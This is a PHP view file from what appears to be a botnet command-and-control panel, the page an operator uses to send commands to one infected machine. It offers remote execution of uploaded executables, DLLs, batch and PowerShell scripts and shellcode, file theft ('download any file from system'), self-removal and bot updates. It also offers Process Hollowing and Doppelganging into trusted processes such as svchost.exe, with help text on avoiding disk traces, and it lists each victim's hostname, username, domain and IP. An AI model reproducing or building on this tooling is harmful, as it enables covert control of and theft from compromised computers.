<?php

use yii\helpers\Html;
use yii\widgets\ActiveForm;
use kartik\tabs\TabsX;
use yii\bootstrap\Modal; 
use yii\helpers\Url; 
use kartik\widgets\FileInput;
use yii\web\UploadedFile;
use common\models\UploadForm;
use common\models\Files;
use kartik\select2\Select2;
use backend\models\Admin;
//use sjaakp\collapse\Collapse;
use kartik\popover\PopoverX;
use yii\bootstrap\Collapse;
use yii\web\JsExpression;

/* @var $this yii\web\View */
/* @var $model common\models\Bots */
/* @var $form yii\widgets\ActiveForm */
if($model->status==2){
    $this->title = "Bot ".$model->bot." is DEAD!";
    $colorstatus = 'grey';
}elseif($model->status==1){
    if($model->busy){
        $this->title = "Bot ".$model->bot." is BUSY!";
        $colorstatus = 'red';
    }else{
        $this->title = "Bot ".$model->bot." is ready";
        $colorstatus = 'green';
    }
}else{
    $this->title = "Bot ".$model->bot." is Offline";
    $colorstatus = 'orange';
    $addonh1 = "You may enqueue commands for it";
}
$this->params['breadcrumbs'][] = "Bot ".$model->bot;

$m = Files::find()->orderBy(['filename'=>SORT_ASC,'created_at'=>SORT_DESC])->where(['group'=>$model->group])->all();
$files = [];
$files['nofile']='...';



$commandtype = ($model->busy == 0) ? [
    'nop'=>'No Operation', 
    'getinfo'=>'Get System Info',
    'runexe'=>'Run .exe',
    'rundll'=>'Run .dll',
    'runbat'=>'Run .bat',
    'runpws'=>'Run PowerShell',
    'runcode'=>'Run Shell Code',
    'reset'=>'Reset',
    'terminate'=>'Terminate Process',
    'download'=>'Download File',
    'suicide'=>'Suicide',
    'update'=>[
        'updateloader32'=>'Upload loader x86',
        'updateloader64'=>'Upload loader x64',
        'updatebot32'=>'Upload bot x86',
        'updatebot64'=>'Upload bot x64',
        'updatenow'=>'Force update now',
    ],
] : [
    'reset'=>'Reset',
    'suicide'=>'Suicide',
];


$runtype = [
    'hollowing' => 'Process Hollowing',
    'dopple' => 'Process Doppelganging',
    'create' => 'CreateProcess',
    'channel' => 'Run from Memory',
    'dump' => 'Dump and Run',
];

$timeout = [
    '0' => 'background run',
    '30' => '30 sec.',
    '60' => '1 min',
    '300' => '5 min.',
    '600' => '10 min',
    '1800'=>'30 min',
    '3600' => '1 hr.',
    '10800' => '3 hrs.',
    '21600'=>'6 hrs.',
    '43200'=>'12 hrs.'
];

$mask = [
    'notuse' => 'Not use',
    'notepad' => 'notepad.exe',
    'explorer' => 'explorer.exe',
    'scvhost' => 'svchost.exe',
    'cmd' => 'cmd.exe',
];

$osys = $model->parseOS($model->os);
$winico = $osys['pic'];

?>
<style type="text/css">

.content-wrapper {
    /*background: url('images/bot1.jpg') !important;
    background-repeat: no-repeat !important;
    background-size: cover !important;
    opacity: 0.8;*/
    background: white !important;
}


.content{
    overflow-x: scroll;
}


.breadcrumb a{
    color:black !important;
    font-weight: bold;
    text-decoration: underline !important;
}


.content-header h1{
    color:<?= $colorstatus ?>;
}

</style>

<?php 
if(isset($addonh1)){
    echo $addonh1;
}


if($model->busy==10){
    $this->registerJs("setInterval(function refresh()
{
    $.pjax.reload({
    container:'#crud-datatable-pjax',
    timeout:60000,
})
},30000);", \yii\web\VIEW::POS_HEAD);
}
?>

<?php $format = new JsExpression(
    "function format(icon) {
                    return '<i class=\"'+ icon.id +'\" aria-hidden=\"true\"></i> '  + icon.text.replace('-', ' ');
                }"
);
?>

<script type="text/javascript">
    file_attr = new Array();
    file_dd = '';
    last_id = 0;
<?php
foreach ($m as $key => $value) {
    $files[$value['storedfilename']]=$value['filename'];
    ?>
    file_attr.push("<?=$value['storedfilename']; ?>","<?=$value['filename']; ?>","<?=$value['size']; ?>","<?=$value['created_at']; ?>","<?=$value['hashmd5']; ?>","<?=(isset(Admin::findOne(['id'=>$value['admin_id']])->login)) ? Admin::findOne(['id'=>$value['admin_id']])->login : ''; ?>","<?=$value['id'];?>"); 
    <?php
}
?>
</script>

<div class="container">
<h4 style="width: 100%; text-align: center;">Command Builder</h4>
<hr>

<table class="special_form" style="text-align: center;">
    <tbody>
        <tr>
            <td style="min-width: 180px;">
                <div>
                <label class="control-label">Command Type</label>&nbsp;
                    <?= PopoverX::widget([
                        'header' => false,
                        'size' => PopoverX::SIZE_LARGE,
                        'placement' => PopoverX::ALIGN_RIGHT_TOP,
                        'content' => '<p><b>no_operation</b> command is needed to ping the bot, and to adjust its wakeup timeout.</p>
                        <p><b>Get_SystemInfo</b> is needed to obtain the information about the system where the bot resides.</p>
                        <p><b>Run_DLL</b> You can upload and run the Dll via rundll32.exe command.</p>
                        <p><b>Run_BAT</b> Here you can run .bat script.</p>
                        <p><b>Run_PWS</b> Here you can run a PowerShell script.</p>
                        <p><b>Reset</b> If the bot stalled with the last command, reset it here.<br> The result of the last command will be lost; although you can run a new command then.</p>
                        <p><b>Terminate_Process</b> You can terminate any process by PID.</p>
                        <p><b>Download</b> You can download any file from system</p>
                        <p><b>Suicide</b> Remove ourselves from system.</p>' ,
                        'footer' => false,
                        'toggleButton' => ['label'=>false, 'class'=>'glyphicon glyphicon-question-sign', 'tag' => 'span'],
                    ]); ?>
                    
                <?= Select2::widget([
                    'id' => 'commandtype',
                    'name' => 'commandtype',
                    'data' => $commandtype,
                    'options' => ['onchange' =>"initcommand()",'class' => 'selectcommand'],

                ]);
                ?>
                </div>
            </td>
            <td id="runtype" style="min-width: 180px;" class='hidetab'>
                <div>
                <label class="control-label">Run type</label>&nbsp;
                <?= PopoverX::widget([
                        'header' => false,
                        'size' => PopoverX::SIZE_LARGE,
                        'placement' => PopoverX::ALIGN_RIGHT_TOP,
                        'content' => '<p><b>How the child process will be spawned:</b></p>
                        <p><b>Process Hollowing</b> a technique by creating a trusted process (such as notepad.exe, svchost.exe) and make it a zombie by replacing its code with our file.</p>
                        <p><b>Process Doppelganging</b> another technique that exploits a trusted process via fake NTFS transaction.</p>
                        <p><b>CreateProcess</b> is a good old "save file to disk and execute it". Should be used as a last resort only, because the file to run is being saved to the hard disk!</p>
                        ' ,
                        'footer' => false,
                        'toggleButton' => ['label'=>false, 'class'=>'glyphicon glyphicon-question-sign', 'tag' => 'span'],
                    ]); ?>
                <?= Select2::widget([
                    'id' => 'selectruntype',
                    'name' => 'runtype',
                    'data' => $runtype,
                    'options' => [
                        'onchange' =>"buildcommand()",
                        'class' => 'selectcommand',
                    ],

                ]);
                ?>
                </div>
            </td>
            <td id="timeout" style="min-width: 120px;">
                <div>
                <label class="control-label">Timeout</label>&nbsp;
                <?= PopoverX::widget([
                        'header' => false,
                        'size' => PopoverX::SIZE_LARGE,
                        'placement' => PopoverX::ALIGN_RIGHT_TOP,
                        'content' => '<p>How many time will we wait until the command finishes.<br>
                        Next command cannot be run during that time.</p>
                        <p>Command can be run also in <b>background</b> mode</p>' ,
                        'footer' => false,
                        'toggleButton' => ['label'=>false, 'class'=>'glyphicon glyphicon-question-sign', 'tag' => 'span'],
                    ]); ?>
                <?= Select2::widget([
                    'id' => 'timeoutselect',
                    'name' => 'timeout',
                    'data' => $timeout,
                    'value' =>'60',
                    'options' => [
                        'onchange' =>"buildcommand()",
                        'class' => 'selectcommand',
                    ],

                ]);
                ?>
                </div>
            </td>
            <td id="mask" class='hidetab'>
                <div>
                <label class="control-label">Host Process</label>&nbsp;
                <?= PopoverX::widget([
                        'header' => false,
                        'size' => PopoverX::SIZE_LARGE,
                        'placement' => PopoverX::ALIGN_RIGHT_TOP,
                        'content' => 'This is the zombie process for Process Hollowing/Doppelganging techniques' ,
                        'footer' => false,
                        'toggleButton' => ['label'=>false, 'class'=>'glyphicon glyphicon-question-sign', 'tag' => 'span'],
                    ]); ?>
                <?= Select2::widget([
                    'id' => 'selectmask',
                    'name' => 'mask',
                    'data' => $mask,
                    'options' => [
                        'onchange' =>"buildcommand()",
                        'class' => 'selectcommand',
                    ],

                ]);
                ?>
                </div>
            </td>
            <td id="uploadfile" class='hidetab fileuploader' style="min-width: 250px;">
                <label class="control-label">Select/Upload execution file</label>&nbsp;
                <?= PopoverX::widget([
                        'header' => false,
                        'size' => PopoverX::SIZE_MEDIUM,
                        'placement' => PopoverX::ALIGN_LEFT_TOP,
                        'content' => '<p><b>Select</b> already existing file in Dropdown field</p>
                        <p>or</p>
                        <p><b>Upload</b> new executoin EXE,DLL,BAT or PWS file by clicking "Browse".
                        <p>New file will be added to Dropdown file list</p>' ,
                        'footer' => false,
                        'toggleButton' => ['label'=>false, 'class'=>'glyphicon glyphicon-question-sign', 'tag' => 'span'],
                    ]); ?>
                <div style="display: flex;">
                    
                    <?= Select2::widget([
                        'id' => 'selectFileUpLoad',
                        'name' => 'files',
                        'data' => $files,
                        'options' => [
                            'onchange' =>"buildcommand()",
                            'class' => 'selectcommand selectcommand--select',
                        ],
                        'pluginOptions' => [
                            'templateResult'    => $format,
                            'templateSelection' => $format,
                            'escapeMarkup'      => new JsExpression("function(m) { return m; }"),
                            'allowClear'        => false,
                        ],
                    ]);
                    ?>
                    
                    <div style="position: relative;">
                    <?=FileInput::widget([
                        'name' => 'file',
                        'options' => [
                            'multiple' => true, 
                            'id' => 'botFileLoad'
                        ],
                        'pluginOptions' => [
                            'allowedFileExtensions' => ['exe', 'dll', 'pws', 'bat', 'ps1'],
                            'previewFileType' => 'any', 
                            'showUpload' => false, 
                            'showRemove' => false, 
                            'initialPreviewAsData' => true, 
                            'overwriteInitial' => true,
                            "uploadUrl" => Url::to(['/upload','group'=>$model->group]),
                            'msgUploadBegin' => '',
                            'msgUploadThreshold' => '',
                            'msgProgress' => '',
                            'msgLoading' => '',
                            'msgPendingTime' => '',
                            'msgCalculatingTime' => '',
                            'msgUploadEnd' => 'Done',
                            'dropZoneClickTitle'=>'',
                            "uploadAsync" => true,
                            "browseOnZoneClick"=>false,
                            'showPreview' => false,
                            'showUploadStats' => false,
                            'showCancel' => false,
                            'fileActionSettings' => [
                                'showZoom' => false,
                                'showRemove' => false,
                                'showUpload' => false,
                            ],
                            'maxFileCount' => 20, 'maxFileSize' => 1000000, 'msgPlaceholder' => '',
                        ],
                        'pluginEvents' => [
                            'filebatchselected' => 'function() {
                             $(this).fileinput("upload");
                             }',

                        ],
                    ]);
                    ?>
                    </div>
                
                </div>
            </td>
            <td id="cmdline" class='hidetab' style="min-width: 160px;">
                <div>
                <label id="cmdline-label" class="control-label"></label>&nbsp;
                <?= PopoverX::widget([
                    'header' => false,
                    'options' => ['id' => 'options-area'],
                    'size' => PopoverX::SIZE_MEDIUM,
                    'placement' => PopoverX::ALIGN_LEFT_TOP,
                    'content' => '<p><b>Type</b> your command line for execution file or script, PID for process must be terminated or name of file will be downloaded<p>
                     
                    ' ,
                    'footer' => false,
                    'toggleButton' => ['label'=>false, 'class'=>'glyphicon glyphicon-question-sign', 'tag' => 'span'],
                ]); ?>
                <input id="cmd" name="cmd" class="special_form form-control selectcommand" onchange="buildcommand()" style="width: 100%;">
                </div>
            </td>
            <td id="scriptarea" class='hidetab' style="min-width: 160px;max-width: 160px;">
                <div>
                <label class="control-label script-label">Script</label>&nbsp;
                <?= PopoverX::widget([
                    'header' => false,
                    'size' => PopoverX::SIZE_MEDIUM,
                    'placement' => PopoverX::ALIGN_LEFT_TOP,
                    'content' => '<p><b>Place</b> your script to resizable box below<p>
                    <p>or</p><p><b>Upload</b> them in "Select/Upload execution file" section.</p> 
                    <p>Script will be appear in resizable box after being uploaded.</p><p>Your uploaded script not will be saved as execution file, but will be saved in command history table.' ,
                    'footer' => false,
                    'toggleButton' => ['label'=>false, 'class'=>'glyphicon glyphicon-question-sign', 'tag' => 'span'],
                ]); ?>
                <textarea id="script" name="script" class="special_form form-control selectcommand" onchange="buildcommand()" style="width: 100%;max-width: 151px;" rows="1" resize="true"></textarea>
                </div>
            </td>
        </tr>
    </tbody>
</table>
<table style="width: 100%;">
    <tbody>
        <tr>
            <td>
                <?php $form = ActiveForm::begin(['options' => ['enctype' => 'multipart/form-data'], 'id' => 'mainform']); ?>

                <?= $form->field($model, 'busy')->hiddenInput(['value'=> 1])->label(false); ?>

                <?php if($model->busy==0){ ?>
                    
                    <?= $form->field($model, 'field0')->hiddenInput(['value'=> 'nop'])->label(false); ?>

                <?php }else{ ?>

                    <?= $form->field($model, 'field0')->hiddenInput(['value'=> 'reset'])->label(false); ?>

                <?php } ?>

                <?= $form->field($model, 'field1')->hiddenInput()->label(false); ?>

                <?php if($model->busy==0){ ?>

                    <?= $form->field($model, 'field2')->hiddenInput(['value'=> '60'])->label(false); ?>

                <?php }else{ ?>
                
                    <?= $form->field($model, 'field2')->hiddenInput(['value'=> '60'])->label(false); ?>

                <?php } ?>        

                <?= $form->field($model, 'field3')->hiddenInput()->label(false); ?>
                
                <?= $form->field($model, 'field4')->hiddenInput()->label(false); ?>

                <?= $form->field($model, 'field5')->hiddenInput()->label(false); ?>

                <?= $form->field($model, 'field6')->hiddenInput()->label(false); ?>

                <?= $form->field($model, 'field7')->hiddenInput()->label(false); ?>

                

                <div class="form-group">
                    <?= Html::submitButton('GO!', ['class' => 'btn btn-danger', 'style' => 'font-weight:bold;max-height:34px;'])

                        .

                        Html::tag('a href="/bots/command?id='.Yii::$app->getRequest()->getQueryParam('id').'"',Html::Button('Clear all filters', ['class' => 'btn btn-default', 'style' => 'max-height:34px;float:right;'])); ?>

                    
                    
                </div>

                <?php ActiveForm::end(); ?>

                <?php $form = ActiveForm::begin(['action' =>['bots/botoptions?id='.$model->bot],'options' => ['enctype' => 'multipart/form-data'], 'id' => 'commentform']); ?>

                <?php
                echo Collapse::widget([
                    'autoCloseItems' => false,
                    'options' => [
                        'class' => 'botPageCollapse',
                    ],
                    'items' => [
                        // equivalent to the above
                        [
                            'label' => 'More bot options...',
                            'content' => $form->field($model, 'comment')->textarea(['rows' => '6','value'=>($model->comment) ? $model->comment : ' '])->label('Comment').
                                $form->field($model, 'priority')->widget(Select2::classname(), ['data' => [
                                                    '0' => '*',
                                                    '1' => '**',
                                                    '2' => '***',
                                                    '3' => '****',
                                                    '4' => '*****',
                                                    ],
                                                ]).
                                $form->field($model, 'autoupdate')->textInput()->label('Autoupdate (Hrs)').
                                $form->field($model, 'update_start')->hiddenInput(['value' => gmdate('Y-m-d H:i:s')])->label(false).
                                Html::submitButton('Save options', ['class' => 'btn btn-danger', 'style' => 'font-weight:bold']),
                            
                        ],
                    ]
                ]);

                ?>

                <?php ActiveForm::end(); ?>
            </td>
        </tr>

    </tbody>
</table>

<h4 style="width: 100%; text-align: center;">Bot info</h4>
<hr>

<div style="display: flex;">
    <div align="right"><b>
        Group : </b><b id="botgroup"><?= $model->group; ?></b> <b>Operating system : </b><img src="<?= Yii::$app->homeUrl.'images/logos/'.$winico ?>" width="25" height="25"> <?= $osys['ver']; ?><b> 
        Build </b><?= $osys['build']; ?> : <?= $osys['pn'] ?> <b>System Architecture </b><?= $model->arch; ?> <b>Location </b><?= isset($model->country) ? $model->country : '?'; ?>&nbsp;<img src="<?= Yii::$app->homeUrl; ?>images/flags/<?= isset($model->country) ? strtolower($model->country) : 'un'; ?>.png" width="25" height="15"> <b>IP:</b><?= $model->ip; ?><br><b>Hostname : </b><?= $model->cname ?>&nbsp;<b>Domain : </b><?= $model->domain ?>&nbsp;<b>Username : </b><?= $model->uname ?>
    </div>
</div>


<?php
echo Collapse::widget([
    'autoCloseItems' => false,
    'options' => [
        'class' => 'botPageCollapse',
    ],
    'items' => [
        // equivalent to the above
        /*[
            'label' => 'proxy stats...',
            'content' => Yii::$app->controller->renderPartial('_expand-proxystats', ['model' => $model]),
            
        ],*/
        [
            'label' => 'more bot info...',
            'content' => Yii::$app->controller->renderPartial('_expand-bots', ['model' => $model]),
            
        ],
        [
            'label' => 'Command history',
            'content' => Yii::$app->controller->renderPartial('_expand-commands',['model'=>$model]),
            'contentOptions' => ['class' => 'in'],
        ],
        
    ]
]);
?>
</div>

<?php Modal::begin([
    "id"=>"ajaxCrudModal",
    "footer"=>"",// always need it for jquery plugin
])?>
<?php Modal::end(); ?>

<div id="fastdeletemodalmask" class="modal-backdrop fade in" style="z-index: 1040;display: none;"></div>

<div class="modal bootstrap-dialog type-warning fade size-normal in" role="dialog" aria-hidden="true" id="fastdeletemodal" aria-labelledby="fastdeletemodal_title" tabindex="-1" style="z-index: 1050; display: none; padding-right: 12px;">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <div class="bootstrap-dialog-header">
                    <div class="bootstrap-dialog-close-button" style="display: block;">
                        <button class="close" data-dismiss="modal" aria-label="close" id="fastdeletemodalclose">×</button>
                    </div>
                    <div class="bootstrap-dialog-title" id="fastdeletemodal_title">Confirmation</div>
                </div>
            </div>
            <div class="modal-body">
                <div class="bootstrap-dialog-body">
                    <div class="bootstrap-dialog-message">Are you sure to delete this item?</div>
                </div>
            </div>
            <div class="modal-footer">
                <div class="bootstrap-dialog-footer">
                    <div class="bootstrap-dialog-footer-buttons">
                        <button class="btn btn-default" id="fastdeletemodalcancel">
                            <span class="glyphicon glyphicon-ban-circle"></span>
                              Cancel
                          </button>
                          <button class="btn btn-warning" id="fastdeletemodalok">
                            <span class="glyphicon glyphicon-ok"></span>
                             Ok
                         </button>
                     </div>
                 </div>
             </div>
         </div>
     </div>
 </div>

<div id="doublefilemodalmask" class="modal-backdrop fade in" style="z-index: 1040;display: none;"></div>

<div class="modal bootstrap-dialog type-warning fade size-normal in" role="dialog" aria-hidden="true" id="doublefilemodal" aria-labelledby="doublefilemodal_title" tabindex="-1" style="z-index: 1050; display: none; padding-right: 12px;">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <div class="bootstrap-dialog-header">
                    <div class="bootstrap-dialog-close-button" style="display: block;">
                        <button class="close" data-dismiss="modal" aria-label="close" id="doublefilemodalclose">×</button>
                    </div>
                    <div class="bootstrap-dialog-title" id="doublefilemodal_title">Confirmation</div>
                </div>
            </div>
            <div class="modal-body">
                <div class="bootstrap-dialog-body">
                    <div class="bootstrap-dialog-message">Such file allready exist!<br>You can cancel uploading file and use existing file or keep both files.</div>
                    <div id="doublefileinfo"></div>
                </div>
            </div>
            <div class="modal-footer">
                <div class="bootstrap-dialog-footer">
                    <div class="bootstrap-dialog-footer-buttons">
                        <button class="btn btn-default" id="doublefilemodalcancel">
                            <span class="glyphicon glyphicon-ban-circle"></span>
                              Cancel
                          </button>
                          <button class="btn btn-warning" id="doublefilemodalok">
                            <span class="glyphicon glyphicon-ok"></span>
                             Keep
                         </button>
                     </div>
                 </div>
             </div>
         </div>
     </div>
 </div>

<div id="errormodalmask" class="modal-backdrop fade in" style="z-index: 1040;display: none;"></div>

<div class="modal bootstrap-dialog type-warning fade size-normal in" role="dialog" aria-hidden="true" id="errormodal" aria-labelledby="errormodal_title" tabindex="-1" style="z-index: 1050; display: none; padding-right: 12px;">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <div class="bootstrap-dialog-header">
                    <div class="bootstrap-dialog-close-button" style="display: block;">
                        <button class="close" data-dismiss="modal" aria-label="close" id="errormodalclose">×</button>
                    </div>
                    <div class="bootstrap-dialog-title" id="errormodal_title">Error!</div>
                </div>
            </div>
            <div class="modal-body">
                <div class="bootstrap-dialog-body">
                    <div class="bootstrap-dialog-message">Required field(s) empty.</div>
                    <div id="doublefileinfo"></div>
                </div>
            </div>
            <div class="modal-footer">
                <div class="bootstrap-dialog-footer">
                    <div class="bootstrap-dialog-footer-buttons">
                        <button class="btn btn-default" id="errormodalcancel">
                            <span class="glyphicon glyphicon-ban-circle"></span>
                              Cancel
                        </button>
                        
                     </div>
                 </div>
             </div>
         </div>
     </div>
 </div>

